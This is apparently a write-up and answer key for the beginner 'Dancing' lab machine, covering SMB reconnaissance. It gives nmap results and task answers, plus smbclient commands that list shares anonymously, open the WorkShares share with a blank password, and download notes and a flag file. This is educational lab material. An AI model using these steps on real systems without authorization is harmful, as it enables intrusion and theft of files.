Dancing

Target Information:

  • 10.129.174.16
  • PORTS:
    • 135/tcp open msrpc
    • 139/tcp open netbios-ssn
    • 445/tcp open microsoft-ds
  • NETWORK SHARES:
    • ADMIN$ Disk Remote Admin
    • C$ Disk Default share
    • IPC$ IPC Remote IPC
    • WorkShares Disk

============================================

Task #1: What does the 3-letter acronym SMB stand for?

  • A: Server Message Block

Task #2: What port does SMB use to operate at?

  • A: 445

Task #3: What is the service name for port 445 that came up in our Nmap scan?

  • A: microsoft-ds
  • nmap 10.129.174.16

Task #4: What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?

  • A: -L

Task #5: How many shares are there on Dancing?

  • A: 4
  • smbclient -N -L 10.129.174.16

Task #6: What is the name of the share we are able to access in the end with a blank password?

  • A: WorkShares
  • smbclient -N \\10.129.174.16\WorkShares

Task #7: What is the command we can use within the SMB shell to download the files we find?

  • A: get
  • help

Root Flag:

  • get Amy.J/worknotes.txt worknotes.txt
  • get James.P\flag.txt